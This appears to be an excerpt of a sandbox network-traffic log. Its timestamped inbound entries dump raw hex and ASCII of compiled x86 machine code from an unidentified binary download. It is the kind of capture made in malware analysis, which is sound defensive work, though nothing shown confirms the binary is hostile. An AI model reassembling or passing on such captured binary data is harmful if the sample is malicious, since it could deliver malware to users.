2023-10-05 16:48:01 UTC	211	IN	Data Raw: 74 2b 31 db 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 47 0c 8b 04 98 ff 30 ff 15 f8 2b 50 00 8b 4e 10 89 04 99 83 c3 01 3b 5e 14 72 e4 ff 37 e8 4d 92 00 00 83 c4 04 89 45 00 eb 3c 57 e8 1f 77 00 00 83 c4 04 eb 2e ff 15 e4 2b 50 00 3d 42 27 00 00 74 15 3d f9 2a 00 00 74 15 3d fa 2a 00 00 0f 84 38 ff ff ff 50 eb d4 b8 b0 1e 4e 00 eb 05 b8 93 e5 4d 00 89 46 04 8b 4c 24 20 31 e1 e8 3e 8b 06 00 89 f0 83 c4 24 5e 5f 5b 5d c3 cc cc cc cc 57 56 8b 7c 24 0c 6a 00 68 18 02 00 00 6a 01 e8 9c 3a 00 00 83 c4 0c 89 c6 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 10 00 00 00 00 c7 40 14 00 00 00 00 c7 00 01 00 00 00 83 c0 18 68 00 02 00 00 57 50 e8 6f c2 07 00 83 c4 0c c6 86 17 02 00 00 00 89 f0 5e 5f c3 57 56 8b 7c 24 0c 6a 00 68 18 02 00 00 6a Data Ascii: t+1G0+PN;^r7ME<Ww.+P=B't=t=8PNMFL$ 1>$^_[]WV\|$jhj:@@@@@hWPo^_WV\|$jhj
2023-10-05 16:48:01 UTC	219	IN	Data Raw: 24 08 31 e1 e8 78 6c 06 00 89 d8 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 83 ec 0c 8b 74 24 1c a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 70 05 4d 00 00 74 17 68 1b 01 00 00 68 b8 50 4f 00 68 72 6c 4f 00 e8 f1 63 07 00 83 c4 0c 8b 7c 24 18 83 3c b5 2c 02 4d 00 02 74 17 68 1c 01 00 00 68 b8 50 4f 00 68 ee 62 4f 00 e8 cc 63 07 00 83 c4 0c 89 34 24 89 e0 6a 00 50 ff 37 e8 a7 3a 00 00 83 c4 0c 89 c6 85 c0 75 17 68 1f 01 00 00 68 b8 50 4f 00 68 04 15 4f 00 e8 9d 63 07 00 83 c4 0c 8b 76 08 8b 4c 24 08 31 e1 e8 c9 6b 06 00 89 f0 83 c4 0c 5e 5f c3 cc 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 70 05 4d 00 02 74 17 68 28 01 00 00 68 b8 50 4f 00 68 ac 62 4f 00 e8 50 63 07 00 83 c4 0c 8b 5c 24 24 8b 7c 24 1c Data Ascii: $1xl^_[WVt$4P1D$<pMthhPOhrlOc\|$<,MthhPOhbOc4$jP7:uhhPOhOcvL$1k^_SWVt$ 4P1D$<pMth(hPOhbOPc\$$\|$
2023-10-05 16:48:01 UTC	227	IN	Data Raw: c0 eb 02 31 c0 5e 5f 5b c3 cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 14 85 f6 7e 37 8b 7c 24 18 8b 5c 24 10 01 de 83 c3 01 90 90 90 90 90 90 90 90 0f be 43 ff 50 57 e8 c5 7b 06 00 83 c4 08 85 c0 74 09 8d 4b 01 39 f3 89 cb 72 e5 85 c0 0f 95 c0 eb 02 b0 01 5e 5f 5b c3 cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 10 8b 7c 24 14 8d 47 01 6a 00 6a 01 50 e8 48 fc ff ff 83 c4 0c 89 c6 57 53 50 e8 9b 74 06 00 83 c4 0c c6 04 3e 00 89 f0 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 7c 24 10 57 e8 10 83 07 00 83 c4 04 50 57 56 e8 95 83 07 00 83 c4 0c 85 c0 0f 94 c0 5e 5f c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 5c 24 14 6a 00 53 e8 50 e1 ff ff 83 c4 08 50 e8 17 53 00 00 83 c4 04 89 c6 68 74 13 4f 00 50 e8 07 85 07 00 83 c4 08 8d 2c Data Ascii: 1^_[SWVt$~7\|$\$CPW{tK9r^_[SWV\$\|$GjjPHWSPt>^_[WVt$\|$WPWV^_USWV\$jSPPShtOP,
2023-10-05 16:48:01 UTC	235	IN	Data Raw: 4b 24 8b 4b 2c 85 c9 0f 84 5f 01 00 00 8b 53 10 89 54 24 10 8b 53 20 89 54 24 14 8b 54 24 10 89 53 0c 8b 54 24 14 89 53 1c 89 4b 28 b9 02 00 00 00 e9 3b 01 00 00 31 db 39 ca 7d 13 eb 1f 80 3c 24 00 74 0b 8d 5d 28 89 1c 24 e9 45 ff ff ff 83 c0 ff 89 c3 8b 44 86 14 01 c7 83 c7 01 8b 44 9e 04 8b 6c 9e 08 8b 4d 04 8b 55 08 89 55 10 8b 55 18 89 55 20 8b 55 24 89 55 2c 89 4d 0c 8b 4d 14 89 4d 1c 89 1c 24 8b 4c 9e 24 89 4d 28 8b 48 08 89 4d 08 8b 50 18 89 55 18 85 c9 74 02 89 29 8b 50 24 89 55 24 8b 58 04 89 5d 04 8b 48 14 89 4d 14 85 db 74 08 89 2b 8b 4d 14 8b 55 24 03 4d 18 03 4d 1c 03 4d 20 83 fa 01 83 d9 ff 83 7d 28 01 83 d9 ff 83 7d 2c 01 83 d9 ff 8b 1c 24 89 4c 9e 18 50 e8 2a dd ff ff 83 c4 04 8b 4c 9e 08 85 c9 0f 84 43 01 00 00 8d 43 01 89 4c 9e 04 8b 4c Data Ascii: K$K,_ST$S T$T$ST$SK(;19}<$t]($EDDlMUUUU U$U,MMM$L$M(HMPUt)P$U$X]HMt+MU$MMM }(},$LP*LCCLL
2023-10-05 16:48:01 UTC	243	IN	Data Raw: ff 66 89 8c 45 52 02 00 00 83 c0 04 3d e0 00 00 00 75 be 8d bd 0c 02 00 00 66 c7 85 0a 03 00 00 7f 00 8d 85 0c 06 00 00 68 00 02 00 00 57 89 44 24 08 50 e8 69 36 06 00 83 c4 0c 8d 85 cc 06 00 00 6a 40 68 0c 09 4d 00 50 e8 53 36 06 00 83 c4 0c 66 c7 85 ca 06 00 00 20 00 31 c0 eb 1b 90 90 90 66 83 f9 20 0f 42 d3 88 94 05 0d 0a 00 00 83 c0 02 3d 00 01 00 00 74 48 0f b7 94 45 0c 02 00 00 8d 5a 81 89 c1 66 83 fb 21 72 05 b9 ff 00 00 00 66 83 fa 20 0f 42 c8 88 8c 05 0c 0a 00 00 0f b7 8c 45 0e 02 00 00 8d 71 81 89 c2 80 c2 01 0f b6 da 89 da 66 83 fe 21 72 a7 ba ff 00 00 00 eb a0 83 7c 24 04 02 0f 83 9f 00 00 00 31 c0 eb 1a 90 81 cb 00 dc 00 00 66 89 5c 45 0c 83 c0 01 3d 00 01 00 00 0f 84 21 01 00 00 0f b7 4c 45 0c 89 ca 81 e2 00 fe 00 00 81 fa 00 dc 00 00 74 dd Data Ascii: fER=ufhWD$Pi6j@hMPS6f 1f B=tHEZf!rf BEqf!r\|$1f\E=!LEt
2023-10-05 16:48:01 UTC	250	IN	Data Raw: cc 8b 44 24 04 8b 4c 24 08 c7 00 02 00 00 00 c7 40 04 e0 f3 43 00 89 48 08 c3 cc cc cc cc cc cc cc 57 56 8b 74 24 1c 8b 7c 24 14 57 e8 d0 25 07 00 83 c4 04 50 57 ff 76 08 e8 83 96 ff ff 83 c4 0c 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 40 6a 01 e8 a5 9e ff ff 83 c4 0c c7 40 2c 00 00 00 00 c7 40 14 00 00 00 00 c7 40 18 00 00 00 00 c7 40 1c 00 00 00 00 c7 40 20 00 00 00 00 c7 40 24 00 00 00 00 c6 00 01 c7 40 0c 00 00 00 00 c7 40 04 00 00 00 00 c6 40 10 00 c6 40 08 00 c7 40 34 00 00 00 00 c7 40 38 00 00 00 00 c7 40 3c 00 00 00 00 c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 14 8a 5c 24 1c 8b 6c 24 18 6a 00 6a 0c 6a 01 e8 25 9e ff ff 83 c4 0c 89 c6 89 28 88 58 04 e8 36 a4 ff ff 89 46 08 8d 47 18 6a 00 6a 01 ff 77 14 6a 04 50 ff 77 1c e8 Data Ascii: D$L$@CHWVt$\|$W%PWv^_jj@j@,@@@@ @$@@@@@4@8@<USWV\|$\$l$jjj%(X6FGjjwjPw
2023-10-05 16:48:01 UTC	258	IN	Data Raw: 68 c0 38 4d 00 e8 17 71 00 00 83 c4 04 89 84 24 d4 03 00 00 6a 76 e8 06 71 00 00 83 c4 04 89 84 24 d0 03 00 00 8b 84 24 d4 03 00 00 8b 8c 24 d0 03 00 00 50 51 68 30 fb 43 00 68 d8 32 4e 00 6a 14 6a 73 68 d5 70 4e 00 56 e8 53 79 00 00 83 c4 20 68 4f 00 4e 00 68 81 00 4e 00 ff b4 24 4c 05 00 00 e8 fa 73 00 00 83 c4 0c 6a 00 68 05 2d 4e 00 68 81 00 4e 00 ff b4 24 50 05 00 00 e8 2f 75 00 00 83 c4 10 89 c6 6a 4d e8 93 70 00 00 83 c4 04 89 84 24 cc 03 00 00 8b 84 24 cc 03 00 00 50 68 a0 fa 43 00 68 3c 27 4e 00 6a 75 68 1f 5e 4e 00 56 e8 ea 81 00 00 83 c4 18 6a 4e e8 60 70 00 00 83 c4 04 89 84 24 c8 03 00 00 8b 84 24 c8 03 00 00 50 68 a0 fa 43 00 68 3c 27 4e 00 6a 6b 68 ac 5e 4e 00 56 e8 b7 81 00 00 83 c4 18 6a 4f e8 2d 70 00 00 83 c4 04 89 84 24 c4 03 00 00 8b Data Ascii: h8Mq$jvq$$$PQh0Ch2NjjshpNVSy hONhN$Lsjh-NhN$P/ujMp$$PhCh<'Njuh^NVjN`p$$PhCh<'Njkh^NVjO-p$
2023-10-05 16:48:01 UTC	266	IN	Data Raw: e8 1c 55 00 00 83 c4 0c 68 7d fa 4d 00 68 05 2d 4e 00 68 54 de 4d 00 53 e8 54 56 00 00 83 c4 10 89 c6 6a 00 e8 b8 51 00 00 83 c4 04 89 84 24 c8 01 00 00 8b 84 24 c8 01 00 00 50 68 10 61 44 00 68 16 1a 4e 00 6a 73 68 b9 b5 4e 00 56 e8 9f 5f 00 00 83 c4 18 c7 40 28 0b 00 00 00 6a 2c e8 7e 51 00 00 83 c4 04 89 84 24 c4 01 00 00 8b 84 24 c4 01 00 00 50 68 a0 fa 43 00 68 89 3a 4e 00 6a 6b 68 89 5c 4e 00 56 e8 d5 62 00 00 83 c4 18 68 ed 5a 4e 00 68 05 f1 4d 00 68 54 de 4d 00 53 e8 cd 55 00 00 83 c4 10 89 c6 68 b0 38 4d 00 e8 2e 51 00 00 83 c4 04 89 84 24 c0 01 00 00 6a 1b e8 1d 51 00 00 83 c4 04 89 84 24 bc 01 00 00 8b 84 24 c0 01 00 00 8b 8c 24 bc 01 00 00 50 51 68 30 fb 43 00 68 d4 d9 4d 00 6a 14 6a 74 68 76 e9 4e 00 56 e8 6a 59 00 00 83 c4 20 68 b0 38 4d 00 Data Ascii: Uh}Mh-NhTMSTVjQ$$PhaDhNjshNV_@(j,~Q$$PhCh:Njkh\NVbhZNhMhTMSUh8M.Q$jQ$$$PQh0ChMjjthvNVjY h8M
2023-10-05 16:48:01 UTC	274	IN	Data Raw: cc 53 57 56 83 ec 54 8b 44 24 70 8b 5c 24 6c 8b 7c 24 68 8b 74 24 64 8b 0d 34 00 50 00 31 e1 89 4c 24 50 83 f8 02 74 2b 85 c0 0f 85 b0 00 00 00 6a 02 53 e8 29 25 ff ff 83 c4 08 83 f8 05 75 48 68 aa 75 4e 00 57 56 e8 b5 e5 fd ff 83 c4 0c 6a 40 eb 55 57 56 e8 d7 de fd ff 83 c4 08 89 c7 50 e8 14 98 06 00 83 c4 04 89 c6 57 e8 61 41 ff ff 83 c4 04 6a 02 53 e8 e6 24 ff ff 83 c4 08 83 f8 05 75 41 56 6a 40 eb 3f 68 93 e7 4d 00 57 56 e8 6d e5 fd ff 83 c4 0c 6a 01 53 e8 c2 24 ff ff 83 c4 08 85 c0 74 29 6a 01 53 e8 b3 24 ff ff 83 c4 08 89 e1 50 68 7d 7a 4e 00 51 e8 c2 bd fb ff 83 c4 0c eb 0f 56 6a 01 53 e8 54 2b ff ff eb 0e c6 04 24 00 89 e0 50 57 56 e8 c4 dd fd ff 83 c4 0c 8b 4c 24 50 31 e1 e8 d6 90 05 00 83 c4 54 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: SWVTD$p\$l\|$ht$d4P1L$Pt+jS)%uHhuNWVj@UWVPWaAjS$uAVj@?hMWVmjS$t)jS$Ph}zNQVjST+$PWVL$P1T^_[
2023-10-05 16:48:01 UTC	282	IN	Data Raw: fd ff 83 c4 10 6a 00 68 70 2e 4e 00 53 57 e8 5e c2 fd ff 83 c4 10 83 fe 02 77 12 b8 02 00 00 00 29 f0 50 53 57 e8 57 c5 fd ff 83 c4 0c 5e 5f 5b e9 cc ca fd ff 53 57 e8 b5 c3 fd ff 83 c4 08 85 c0 78 0d 50 53 57 e8 06 c3 fd ff 83 c4 0c eb 05 b8 02 00 00 00 50 ff 77 14 56 e8 82 0c ff ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 44 24 1c 8b 74 24 18 8b 5c 24 14 8b 7c 24 10 83 f8 03 74 5c 85 c0 0f 85 96 00 00 00 ff 77 14 56 e8 87 05 ff ff 83 c4 08 89 c6 53 57 e8 eb c9 fd ff 83 c4 08 53 57 e8 61 c0 fd ff 83 c4 08 6a 01 68 28 48 4e 00 53 57 e8 b0 c1 fd ff 83 c4 10 6a 00 68 70 2e 4e 00 53 57 e8 9f c1 fd ff 83 c4 10 83 fe 01 74 26 85 f6 75 2f b8 01 00 00 00 eb 1d 53 57 e8 05 c3 fd ff 83 c4 08 85 c0 78 22 50 53 57 e8 56 c2 fd ff 83 c4 0c eb Data Ascii: jhp.NSW^w)PSWW^_[SWxPSWPwV^_[SWVD$t$\$\|$t\wVSWSWajh(HNSWjhp.NSWt&u/SWx"PSWV
2023-10-05 16:48:01 UTC	289	IN	Data Raw: c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 4b 03 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 04 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 20 89 46 1c 8b 44 24 24 89 46 10 89 6e 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 98 59 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 66 c7 46 25 00 00 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 18 8b 5c 24 14 8b 6c 24 28 6a 00 6a 44 6a 01 e8 15 02 ff ff 83 c4 0c 89 c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 9b 02 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 05 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 20 89 46 1c 8b 44 24 24 89 46 10 89 Data Ascii: CjjsjPsKCKQS4FCFD$ FD$$FnFF tWY1FD$F$fF%^_[]USWV\|$\$l$(jjDjCjjsjPsCKQS4FCFD$ FD$$F
2023-10-05 16:48:01 UTC	297	IN	Data Raw: 7c 24 24 57 e8 f8 d2 01 00 83 c4 28 83 f8 02 74 24 83 f8 01 74 67 85 c0 0f 85 04 01 00 00 8b 44 24 10 85 c0 0f 84 8a 00 00 00 50 68 51 10 4e 00 e9 a7 00 00 00 ff 74 24 10 68 a3 07 4e 00 ff 74 24 40 e8 5a a2 fd ff 83 c4 0c 8b 44 24 40 89 28 8b 44 24 04 89 45 04 68 60 06 42 00 e8 c0 f4 fe ff 83 c4 04 89 45 08 c7 45 14 00 00 00 00 89 7d 00 c7 45 0c 01 00 00 00 e9 a5 00 00 00 ff 74 24 10 68 c1 07 4e 00 ff 74 24 40 e8 12 a2 fd ff 83 c4 0c 8b 44 24 40 c7 00 00 00 00 00 55 e8 6f e3 fe ff 83 c4 04 57 e8 66 e3 fe ff 83 c4 04 8b 74 24 04 eb 6e 8b 44 24 0c 85 c0 74 12 50 68 f3 0f 4e 00 ff 74 24 40 e8 d6 a1 fd ff 83 c4 0c 8b 44 24 08 85 c0 74 12 50 68 bf 0f 4e 00 ff 74 24 40 e8 bc a1 fd ff 83 c4 0c 83 7c 24 04 00 74 17 68 53 08 00 00 68 b8 4d 4f 00 68 76 68 4f 00 e8 Data Ascii: \|$$W(t$tgD$PhQNt$hNt$@ZD$@(D$Eh`BEE}Et$hNt$@D$@UoWft$nD$tPhNt$@D$tPhNt$@\|$thShMOhvhO
2023-10-05 16:48:01 UTC	305	IN	Data Raw: 53 e8 30 09 06 00 83 c4 08 85 c0 74 5d 68 8d 4e 4e 00 53 e8 1e 09 06 00 83 c4 08 85 c0 74 4b 68 75 e5 4e 00 53 e8 0c 09 06 00 83 c4 08 85 c0 b9 00 00 00 00 0f 84 87 fe ff ff 53 e8 39 1b 06 00 83 c4 04 31 c9 85 c0 0f 95 c1 e9 72 fe ff ff 31 ff e9 7c fe ff ff b9 01 00 00 00 e9 61 fe ff ff b9 ff 00 00 00 e9 57 fe ff ff 31 c9 e9 50 fe ff ff c7 04 24 00 96 00 00 c7 44 24 04 00 96 00 00 6a 37 ff 74 24 2c e8 26 a9 fe ff 83 c4 08 89 e1 51 8d 4c 24 08 51 68 9f e1 4d 00 50 e8 d0 90 fb ff 83 c4 10 c6 86 00 01 00 00 01 8b 04 24 89 86 04 05 00 00 c6 86 01 01 00 00 01 8b 44 24 04 89 86 08 05 00 00 8b 4c 24 08 31 e1 e8 f1 13 05 00 89 f0 83 c4 0c 5e 5f 5b 5d c3 68 de 01 00 00 68 a2 42 4f 00 68 a6 8f 4f 00 e8 96 0b 06 00 83 c4 0c e8 8b 9a fb ff cc cc cc cc cc cc cc cc cc Data Ascii: S0t]hNNStKhuNSS91r1\|aW1P$D$j7t$,&QL$QhMP$D$L$1^_[]hhBOhO
2023-10-05 16:48:01 UTC	313	IN	Data Raw: 51 ff 52 08 83 c4 0c 01 c7 53 55 e8 d1 fd fe ff 83 c4 08 eb cc 3b 3c 24 73 0d 8b 46 08 8b 08 57 50 ff 51 0c 83 c4 08 80 7e 5c 00 74 0c 8b 46 04 8b 08 50 ff 51 10 83 c4 04 80 7e 5d 00 74 05 83 c4 0c eb 15 8b 86 88 00 00 00 81 c6 88 00 00 00 6a 00 56 ff 50 14 83 c4 14 5e 5f 5b 5d c3 cc cc cc 8a 44 24 10 0f b6 c0 ff 74 24 18 50 ff 74 24 14 ff 74 24 14 ff 74 24 14 e8 23 76 fe ff 83 c4 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 08 8b 54 24 04 8b 42 80 85 c9 74 03 89 4a 80 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 86 7c ff ff ff 8b 08 50 ff 51 04 83 c4 04 ff 76 8c e8 e3 6f fe ff 83 c4 04 ff 76 84 e8 d8 6f fe ff 83 c4 04 8b 46 d8 85 c0 74 10 8b 08 50 ff 51 08 83 c4 04 c7 46 d8 00 00 00 00 83 7e fc 00 74 19 ff 76 f4 e8 30 70 Data Ascii: QRSU;<$sFWPQ~\tFPQ~]tjVP^_[]D$t$Pt$t$t$#vL$T$BtJWVt$\|PQvovoFtPQF~tv0p
2023-10-05 16:48:01 UTC	321	IN	Data Raw: 00 00 8b 4e 04 89 4c 24 44 8b 08 89 4c 24 30 c7 44 24 34 02 00 00 00 8b 40 04 89 44 24 38 c7 44 24 24 00 00 00 00 c7 44 24 28 01 00 00 00 8d 44 24 3c 89 44 24 2c c7 44 24 18 00 00 00 00 c7 44 24 1c 01 00 00 00 8d 44 24 30 89 44 24 20 8b 45 14 83 f8 01 b8 17 01 00 00 83 d8 00 c7 44 24 14 00 00 00 00 8d 5a 10 8d 4a 08 8d 74 24 08 8d 7c 24 14 56 57 8d 74 24 2c 56 89 5c 24 10 53 89 d3 6a 00 8d 54 24 2c 52 6a 10 6a 00 50 ff 75 10 ff 73 18 51 ff 15 9c 33 50 00 89 03 83 7d 20 00 75 0a 83 7d 24 00 0f 84 f0 00 00 00 8d 44 24 58 50 ff 15 3c da 4f 00 8b 74 24 58 8b 7c 24 5c 89 f0 09 f8 74 29 c7 04 24 00 00 00 00 6a 00 68 80 96 98 00 57 56 e8 a8 d5 04 00 89 c6 89 d7 b8 00 6f ef 49 01 c6 b8 fd ff ff ff 11 c7 eb 07 c7 04 24 00 00 00 00 8b 45 24 8b 4d 20 85 c0 74 06 c7 Data Ascii: NL$DL$0D$4@D$8D$$D$(D$<D$,D$D$D$0D$ ED$ZJt$\|$VWt$,V\$SjT$,RjjPusQ3P} u}$D$XP<Ot$X\|$\t)$jhWVoI$E$M t
2023-10-05 16:48:01 UTC	328	IN	Data Raw: 44 f1 8b 7c 24 24 8b 5c 24 08 8b 8b 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 62 a6 ff ff 83 c4 0c 57 56 50 68 fd e1 4d 00 ff b3 ac 00 00 00 e8 6c 36 fd ff 83 c4 14 8b 8c 24 48 05 00 00 31 e1 e8 bb b6 04 00 8b 44 24 1c 81 c4 4c 05 00 00 5e 5f 5b 5d c3 8b 8f 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 17 a6 ff ff 83 c4 0c 50 68 94 e6 4d 00 ff b7 ac 00 00 00 e8 23 36 fd ff 83 c4 0c eb b5 8b 73 08 8b 7c 24 08 8b 8f 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 e2 a5 ff ff 83 c4 0c 56 50 68 55 e6 4d 00 ff b7 ac 00 00 00 e8 ed 35 fd ff 83 c4 10 e9 7c ff ff ff cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 8b 09 31 d2 3b 48 08 0f 97 c2 b8 ff ff ff ff 0f 43 c2 c3 cc cc cc cc cc 53 57 56 80 79 10 00 0f 85 97 00 00 00 89 ce 8b 19 8b 41 14 8b 49 68 89 c2 83 e2 04 c1 ea Data Ascii: D\|$$\$IHPqqbWVPhMl6$H1D$L^_[]IHPqqPhM#6s\|$IHPqqVPhUM5\|D$L$1;HCSWVyAIh
2023-10-05 16:48:01 UTC	336	IN	Data Raw: 31 e1 e8 ba 97 04 00 8b 04 24 83 c4 10 5e 5f 5b 5d c3 ff 77 08 68 be 0b 4f 00 ff b6 b4 00 00 00 e8 0c 15 fd ff 83 c4 0c eb d2 cc cc cc cc cc cc cc 53 57 56 80 79 10 00 0f 85 52 01 00 00 89 ce 8b 19 8b 49 14 89 c8 f7 d0 a8 05 74 24 89 c8 83 e0 04 c1 e8 02 83 e1 01 8b 56 1c 8b 3a 50 51 52 ff 57 1c 83 c4 0c 8b 4e 14 84 c0 0f 84 8b 00 00 00 f6 c1 02 0f 85 82 00 00 00 f6 c1 01 75 3c 8b 83 8c 00 00 00 8b 00 6a 18 ff 50 0c 83 c4 04 89 c7 83 c0 30 ff 76 04 50 e8 94 3f fe ff 83 c4 08 83 c7 20 57 ff b3 94 00 00 00 e8 e2 7b ff ff 83 c4 08 8b 4e 14 83 c9 01 89 4e 14 f6 c1 04 74 3c 8b 83 8c 00 00 00 8b 00 6a 19 ff 50 0c 83 c4 04 89 c7 83 c0 30 ff 76 04 50 e8 53 3f fe ff 83 c4 08 83 c7 20 57 ff b3 94 00 00 00 e8 a1 7b ff ff 83 c4 08 8b 4e 14 83 c9 02 89 4e 14 f7 d1 f6 Data Ascii: 1$^_[]whOSWVyRIt$V:PQRWNu<jP0vP? W{NNt<jP0vPS? W{NN
2023-10-05 16:48:01 UTC	344	IN	Data Raw: 83 c4 04 8d 7c 24 18 6a 20 57 ff 73 04 e8 af 1f fe ff 83 c4 0c 8b 6c 24 04 8d 45 64 6a 10 50 ff 73 04 e8 9a 1f fe ff 83 c4 0c 8b 03 57 53 ff 50 0c 83 c4 08 8b 03 53 ff 50 10 83 c4 04 8b 85 5c 01 00 00 8b 00 6a 08 ff 50 0c 83 c4 04 89 c3 83 c0 30 6a 10 57 50 e8 66 1f fe ff 83 c4 0c 83 c3 20 53 ff b5 64 01 00 00 e8 e4 5c ff ff 83 c4 08 c6 45 15 00 ff 34 24 e8 25 25 01 00 83 c4 04 56 e8 1c 25 01 00 83 c4 04 c7 45 00 16 03 00 00 8b 5c 24 50 53 e8 58 73 ff ff 83 c4 04 84 c0 0f 85 86 e8 ff ff 8b 85 60 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 85 c0 0f 84 6e e8 ff ff 89 c6 8b 00 83 f8 0f 0f 85 81 08 00 00 8b 85 7c 01 00 00 8b 08 50 ff 51 64 83 c4 04 84 c0 0f 84 1f f4 ff ff 68 77 0f 4f 00 e8 d7 1c fe ff 83 c4 04 50 53 e8 5d 6a ff ff 83 c4 08 e9 03 f4 ff ff 80 bd 54 Data Ascii: \|$j Wsl$EdjPsWSPSP\jP0jWPf Sd\E4$%%V%E\$PSXs`jPPPn\|PQdhwOPS]jT
2023-10-05 16:48:01 UTC	352	IN	Data Raw: 8b 68 24 89 6c 24 08 8b 47 04 89 44 24 0c 85 db 7e 21 8d 6f 30 31 f6 90 90 90 90 90 90 90 90 90 90 6a 00 55 e8 d8 00 fe ff 83 c4 08 83 c6 01 39 de 7c ee 8b 47 10 8b 6c 24 0c 01 e8 53 50 e8 5e 01 fd ff 83 c4 08 8b 47 10 88 58 04 8b 0c 24 01 e9 8b 47 10 89 0c 24 0f c9 89 08 8b 74 24 04 8b 46 54 85 c0 74 17 8b 08 f6 41 34 02 74 0f ff 76 50 6a 04 ff 77 10 50 ff 51 18 83 c4 10 01 dd 8d 47 30 6a 00 ff 74 24 0c 50 e8 03 00 fe ff 83 c4 0c 8b 46 58 85 c0 74 45 80 7e 5c 00 74 2f 8b 4e 54 85 c9 74 16 8b 47 10 83 c0 04 8b 11 ff 34 24 50 51 ff 52 10 83 c4 0c 8b 46 58 ff 76 50 55 ff 77 10 50 e8 19 74 02 00 83 c4 10 eb 24 ff 76 50 55 ff 77 10 50 e8 07 74 02 00 83 c4 10 8b 46 54 85 c0 74 23 8b 08 55 ff 77 10 50 ff 51 10 83 c4 0c 8b 46 54 83 46 50 01 85 c0 74 0f 8b 08 50 Data Ascii: h$l$GD$~!o01jU9\|Gl$SP^GX$G$t$FTtA4tvPjwPQG0jt$PFXtE~\t/NTtG4$PQRFXvPUwPt$vPUwPtFTt#UwPQFTFPtP
2023-10-05 16:48:01 UTC	360	IN	Data Raw: 45 24 8b 08 6a 01 50 ff 51 58 83 c4 08 53 e8 8e ad 00 00 83 c4 04 57 50 68 56 04 4e 00 e8 1f df fd ff 83 c4 0c eb 3f c6 45 f5 01 68 25 4a 4e 00 e8 0c df fd ff 83 c4 04 50 ff 75 20 e8 40 a8 fc ff 83 c4 08 80 be 64 01 00 00 00 75 5f eb 30 83 78 0c 00 0f 85 0f 07 00 00 68 e4 49 4e 00 e8 de de fd ff 83 c4 04 50 ff 75 20 e8 12 a8 fc ff 83 c4 08 c6 45 f5 00 80 be 64 01 00 00 00 75 2d 8b 86 8c 01 00 00 8b 08 6a 01 6a 00 50 ff 51 54 83 c4 0c 89 86 60 01 00 00 85 c0 74 09 50 e8 ff f6 fd ff 83 c4 04 c6 86 64 01 00 00 01 c7 06 46 06 00 00 8b 04 24 8b 00 90 90 90 90 90 90 90 90 90 90 6a 00 50 50 ff 50 18 83 c4 0c 85 c0 74 26 83 38 35 75 21 89 f1 89 c2 e8 04 28 00 00 8b 86 70 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 8b 86 70 01 00 00 eb cc 8b 04 24 8b 00 6a 01 50 50 ff Data Ascii: E$jPQXSWPhVN?Eh%JNPu @du_0xhINPu Edu-jjPQT`tPdF$jPPPt&85u!(pjPPPp$jPP
2023-10-05 16:48:01 UTC	368	IN	Data Raw: 00 89 d8 83 c4 14 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 53 57 56 83 ec 24 89 d6 89 cf 8b 5c 24 40 8b 54 24 3c 8b 4c 24 38 8b 87 a4 00 00 00 85 c0 0f 84 b9 03 00 00 89 74 24 1c 8b 70 04 8b 68 08 52 51 e8 6a 61 00 00 83 c4 08 89 44 24 18 e8 ae cf fd ff 89 44 24 0c 8b 87 a8 00 00 00 85 c0 75 0b e8 9b cf fd ff 89 87 a8 00 00 00 ff 74 24 44 53 ff 70 08 ff 70 04 e8 15 cc fd ff 83 c4 10 88 44 24 03 84 c0 75 27 6a 00 ff b7 a8 00 00 00 e8 cd ce fd ff 83 c4 08 8b 87 a8 00 00 00 83 c0 0c ff 74 24 44 53 50 e8 56 c1 fd ff 83 c4 0c 55 56 e8 6c 63 00 00 83 c4 08 89 c3 85 c0 0f 84 3d 01 00 00 80 7b 6c 00 0f 84 54 01 00 00 55 56 53 ff 13 83 c4 0c 85 c0 89 44 24 20 0f 84 5c 01 00 00 89 7c 24 10 89 c5 e8 16 cf fd ff 89 c7 8d 70 0c 8b 45 00 55 ff 50 34 83 c4 04 8b 08 56 50 ff Data Ascii: ^_[]USWV$\$@T$<L$8t$phRQjaD$D$ut$DSppD$u'jt$DSPVUVlc={lTUVSD$ \\|$pEUP4VP
